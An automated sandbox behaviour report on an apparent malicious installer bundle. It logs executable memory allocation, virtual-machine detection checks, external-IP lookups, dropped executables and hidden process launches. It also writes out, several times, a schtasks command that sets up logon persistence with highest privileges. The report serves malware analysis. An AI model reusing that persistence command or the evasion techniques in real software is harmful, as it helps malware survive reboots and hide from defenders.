NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1434000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1434000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d6c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:48 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ccc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cbc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91de0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cdb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d0c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cdd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91de1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 126976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cbb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d0d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ccb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 7, 2021, 11:49 a.m.	process_identifier: 1164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91e30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (11 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW Sept. 7, 2021, 11:49 a.m.	total_number_of_free_bytes: 10930790400 free_bytes_available: 10930790400 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Sept. 7, 2021, 11:57 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 0 root_path: \\?\C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\ total_number_of_bytes: 0		0
GetDiskFreeSpaceExW Sept. 7, 2021, 11:57 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 0 root_path: \\?\C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\ total_number_of_bytes: 0		0
GetDiskFreeSpaceExW Sept. 7, 2021, 11:57 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 0 root_path: \\?\C:\Users\test22\AppData\Roaming\AW Manager\ total_number_of_bytes: 0		0
GetDiskFreeSpaceExW Sept. 7, 2021, 11:57 a.m.	total_number_of_free_bytes: 10925465600 free_bytes_available: 10925465600 root_path: \\?\C:\Users\test22\AppData\Roaming\ total_number_of_bytes: 10925465600	1	1
GetDiskFreeSpaceExW Sept. 7, 2021, 11:57 a.m.	total_number_of_free_bytes: 10925256704 free_bytes_available: 10925256704 root_path: \\?\C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\ total_number_of_bytes: 10925256704	1	1
GetDiskFreeSpaceExW Sept. 7, 2021, 11:57 a.m.	total_number_of_free_bytes: 10923761664 free_bytes_available: 10923761664 root_path: \\?\C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\ total_number_of_bytes: 10923761664	1	1
GetDiskFreeSpaceExW Sept. 7, 2021, 11:57 a.m.	total_number_of_free_bytes: 10920275968 free_bytes_available: 10920275968 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceW Sept. 7, 2021, 11:57 a.m.	number_of_free_clusters: 2666083 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceExW Sept. 7, 2021, 11:57 a.m.	total_number_of_free_bytes: 10915991552 free_bytes_available: 10915991552 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceW Sept. 7, 2021, 11:57 a.m.	number_of_free_clusters: 2665037 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1

Looks up the external IP address (2 events)

domain	ipinfo.io
domain	ip-api.com

Creates executable files on the filesystem (12 events)

file	C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
file	C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
file	C:\Users\test22\AppData\Local\Temp\api-ms-win-core-namedpipe-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\is-CHG20.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-CHG20.tmp\Setup.exe
file	C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi
file	C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
file	C:\Users\test22\AppData\Local\Temp\installer.exe
file	C:\Users\test22\AppData\Local\Temp\axhub.dll
file	C:\Users\test22\AppData\Local\Temp\api-ms-win-core-string-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\gdgame.exe
file	C:\Users\test22\AppData\Local\Temp\is-CHG20.tmp\itdownload.dll

Creates a shortcut to an executable file (12 events)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"'
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit

Drops a binary and executes it (6 events)

file	C:\Program Files (x86)\SmartPDF\SmartPDF\Visit.url
file	C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
file	C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
file	C:\Users\test22\AppData\Local\Temp\gdgame.exe
file	C:\Users\test22\AppData\Local\Temp\installer.exe
file	C:\Users\test22\AppData\Local\Temp\is-CHG20.tmp\Setup.exe

Drops an executable to the user AppData folder (12 events)

file	C:\Users\test22\AppData\Local\Temp\MSI7D.tmp
file	C:\Users\test22\AppData\Local\Temp\INA5D.tmp
file	C:\Users\test22\AppData\Local\Temp\MSIBC.tmp
file	C:\Users\test22\AppData\Local\Temp\gdgame.exe
file	C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
file	C:\Users\test22\AppData\Local\Temp\is-CHG20.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-CHG20.tmp\itdownload.dll
file	C:\Users\test22\AppData\Local\Temp\api-ms-win-core-namedpipe-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\api-ms-win-core-string-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\is-RDMLJ.tmp\stats.tmp
file	C:\Users\test22\AppData\Local\Temp\axhub.dll
file	C:\Users\test22\AppData\Local\Temp\installer.exe

A process created a hidden window (6 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 7, 2021, 11:56 a.m.	show_type: 0 filepath_r: C:\Program Files (x86)\SmartPDF\SmartPDF\Visit.url parameters: filepath: C:\Program Files (x86)\SmartPDF\SmartPDF\Visit.url	1	1
ShellExecuteExW Sept. 7, 2021, 11:56 a.m.	show_type: 0 filepath_r: C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe parameters: filepath: C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe	1	1
ShellExecuteExW Sept. 7, 2021, 11:56 a.m.	show_type: 0 filepath_r: C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe parameters: /Verysilent filepath: C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe	1	1
ShellExecuteExW Sept. 7, 2021, 11:49 a.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit filepath: cmd	1	1
ShellExecuteExW Sept. 7, 2021, 11:49 a.m.	show_type: 0 filepath_r: C:\Users\test22\services32.exe parameters: filepath: C:\Users\test22\services32.exe	1	1
ShellExecuteExW Sept. 7, 2021, 11:57 a.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit filepath: cmd	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (5 events)

Time & API	Arguments	Status	Return
Process32NextW Sept. 7, 2021, 11:57 a.m.	snapshot_handle: 0x00000120 process_name: SearchFilterHost.exe process_identifier: 876	1	1
Process32NextW Sept. 7, 2021, 11:57 a.m.	snapshot_handle: 0x00000120 process_name: iexplore.exe process_identifier: 1648	1	1
Process32NextW Sept. 7, 2021, 11:57 a.m.	snapshot_handle: 0x00000120 process_name: Setup.exe process_identifier: 1164	1	1
Process32NextW Sept. 7, 2021, 11:57 a.m.	snapshot_handle: 0x00000120 process_name: WmiPrvSE.exe process_identifier: 3000	1	1
Process32NextW Sept. 7, 2021, 11:57 a.m.	snapshot_handle: 0x00000120 process_name: rundll32.exe process_identifier: 1984	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 7, 2021, 11:49 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (41 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 7, 2021, 11:49 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:48 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:48 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:48 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:48 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:48 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:48 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:48 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:48 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:49 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeCreateTokenPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeAssignPrimaryTokenPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeMachineAccountPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeTcbPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeLoadDriverPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeRemoteShutdownPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeEnableDelegationPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeManageVolumePrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeCreateGlobalPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeCreateTokenPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeAssignPrimaryTokenPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeMachineAccountPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeTcbPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeLoadDriverPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeRemoteShutdownPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeEnableDelegationPrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeManageVolumePrivilege	1	1
LookupPrivilegeValueW Sept. 7, 2021, 11:57 a.m.	system_name: privilege_name: SeCreateGlobalPrivilege	1	1

Expresses interest in specific running processes (1 event)

process

rundll32.exe

Queries for potentially installed applications (2 events)

Time & API	Arguments	Status	Return	Repeated
RegOpenKeyExA Sept. 7, 2021, 11:56 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{2B19DCAB-2551-4AF6-A8B1-EAC0CD3D66C0}_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{2B19DCAB-2551-4AF6-A8B1-EAC0CD3D66C0}_is1		2	0
RegOpenKeyExA Sept. 7, 2021, 11:56 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{2B19DCAB-2551-4AF6-A8B1-EAC0CD3D66C0}_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{2B19DCAB-2551-4AF6-A8B1-EAC0CD3D66C0}_is1		2	0

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"'
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit

One or more of the buffers contains an embedded PE file (9 events)

buffer	Buffer with sha1: c3b8f89b5346818dc3a5dae9a352bcd9a6961274
buffer	Buffer with sha1: 26816dea6c5274208e07cfee13108976a7d8ba5c
buffer	Buffer with sha1: 24f732917bba7f8e06359ceb122abb309a583511
buffer	Buffer with sha1: 8d19fdbfd57b54b5abd82c58ad8594fde99c1c2c
buffer	Buffer with sha1: 0674cccae8519c229d9a2c70ac9a24ded875df96
buffer	Buffer with sha1: 231ac9daa6f34accc96e48c916281a5b93844a6d
buffer	Buffer with sha1: 704d00610eda305f30fb0e5b8cc340360028c06c
buffer	Buffer with sha1: 0a15086ccb936897cbd272b579c6bed354800227
buffer	Buffer with sha1: ea9a48fd57fe97a8563d6acc1746a20e50d24a3a

Communicates with host for which no DNS query was performed (1 event)

host

117.18.232.200

Installs itself for autorun at Windows startup (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"'
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit

Creates or sets a registry key to a long series of bytes, possibly to store a binary or malware config (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExW Sept. 7, 2021, 11:57 a.m.	key_handle: 0x00000124 regkey_r: 1 reg_type: 3 (REG_BINARY) value: ÁÕx4XÁåH<PÁýPwËoÜØ_µHÅµ¾HÅ¼«HcáA@Å±4^¯fZÅÊC@K°h·?ËjètM=ãK£¹áü÷¶Ãc~¹²$ ?xÃ{aLÇs°Íh$ÏüsEø½ç@tPAÊ]ù¸003ú6)Ã{¸ÍE´H±Æ·¹ÎMÅÉ`tÃ]ÁÍ`dÁÂGÅh»ÿ^ßptÃE&÷3áù¸HÃE¾(Ã×x\|ÃçHD(ÃÿPL ËGôqÃ çÁÕx<Åh,]ÅáHñÉm,Àe-Ã!E`3èâ.DDHîçLLLHÃÛHTÇÙB]ÆÉr}ÈEÏû~I#\|·@NRÆPÉ7¼BÉÌüp:ò2z½ÃÎòÿ)øTK¸ÀL½ThÃÞêúÎRÖ±¼ÃÄº[B!ãË·=ÊhêtªÀ4³pºÊúQiJó±x`AnóÁÏXNÛÅûrEN±½J¶<ÇÓyc¤c1~"yò8zBaj ;»¾ÊÊe©3vJÃÏ¸£@ÊÂUUJËCØJÓrêÞ7µÎ&JÂsëß!¦Aø.@\|2~oNÇH<>Î±~¦$ËÍÏJKP{û´®ÉÌ@p·OÁN±¾I¶?Âû¹y`§eXXJ>==>§"ÍÅ K¸ûòÁ#ÀL¼eIOfïÕBE´kWÅÀL[ß±¿À Æ¹X@#ãÛ·>Ëiët^õ;¡Ñï§±·ÅÀ8/]÷©¿ìOÃI)é1óÃ¸ÔðHÉEÀ_ËoÄÀûí·ËkáAËGìëÁÕx,]ËoÜxÃrrQcõ;Q!ïFáü÷¶ÁÍ`À6#F²$ ?xÃc9,F;ÂÁ ¬LÇkTAFð¾õz4ÇsGRFR¹Á ¤èu`·ÁÍ`lÇckx»3t4ó)¼V¸õZf_>s~²½ f_>r+KtÅ Hsâ«§T½nEt}½<u¶{¸ fãÁz(bÃA²z(vÄHðf_}zaÑàK¸óz8JÁ¹ úBZÉÜPLÈE´VkÄÊE:øÌþ¶JÑËBéarë¬ÔúÏÇr}~ñÅß¢»Ïßjjgá¾5FÒÊI¶µoù´'zó»OqÀAÊJxrCIÊÈGENHC;áÑÂÀÖsiÌÄ¶üËCJ¶ÚáêNLÏZÊkét¾ojn_¾øù@Aù¸00AÊYáú6ÃSÍEÏ_%»ÏÏzjÃ\ÃC¾(vúN¸^"wr8u:Èäh¸rÅÁÊJÚE´VgÎJÖEÀE´aTÊZÒHÅKKÔ¾(vú¯'Bî]WR8t²ÇçHõZf_:wweïK+GèEHKøÂ>sv7°EÏ D}¶;´HÅOÇPgto»NÏÉFEBË¼ý½AÊKËkà@9¤/³UE¾EwÁÇBMJ¸¶¸¹ððAN¸w¦Eâx¹ f]ú´dKÀaðJÇOMHÊBÃOfÿ¡¹vúBÉFLKÓ[NÏÉFEBË½ÖïÇ/¬EÏHÅ¹7EÏÅBHÏå~XKÈÏ{¼Oè§Oð«pmvúÇk¨ÍEÏü¾Êb¤t7z3ÂEÎr±ÃXÂGÍW«\| ¸e9ìOËAÀJKÐ,k°¤EvúÍEÏÄ½´Â+g·:Çv´&äHÆ;{u0\|Ê÷ËEÒEµôÍÇ/¬LÇçHdÏ' EÀE´S¬#¤E´iCðâ¿«ÇOÇH+éB¾ÁÖouvóKôW`Ã@KøºÌýq])(REµhXvóóáÃ@4(äáù¸HÃ@¾+=OZtMÃ×xT8ËGôq²Ñ«XÄÂ/qÍ 